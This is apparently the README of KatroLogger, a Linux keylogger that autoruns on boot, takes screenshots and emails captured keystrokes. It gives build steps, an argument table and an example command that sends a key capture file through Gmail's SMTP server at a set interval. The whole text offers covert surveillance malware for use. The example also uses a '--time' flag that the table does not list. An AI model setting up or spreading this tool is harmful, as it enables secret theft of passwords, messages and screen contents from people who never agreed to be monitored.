- Runs on GUI systems or CLI
- Sending data by email
- Autorun on boot
- Screenshots
Install libquickmail:
wget https://ufpr.dl.sourceforge.net/project/libquickmail/libquickmail-0.1.29.tar.xz
tar -xvf libquickmail-0.1.29.tar.xz
./autogen.sh && ./configure && make && make install
./configure && make && make install
katrologger --output /path/file
Argument | Description |
---|---|
--smtp-status | email sending status |
--smtp-url | SMTP server |
--smtps-url | SMTPS server |
--port | SMTP port |
--mail-from | source email |
--pass | password email |
--mail-rcpt | receipt email |
--smtp-file | attach key capture file for sending |
--update | update interval for sending email, 1-60 (minutes) |
--screen | screenshots (:0 is display default) |
katrologger --smtps-url smtp.gmail.com --port 465 --mail-from <address> --mail-rcpt <address> --pass <password> --smtp-file /path/keyscan --time 10
make uninstall
KatroLogger is licensed under the GNU General Public License v3.0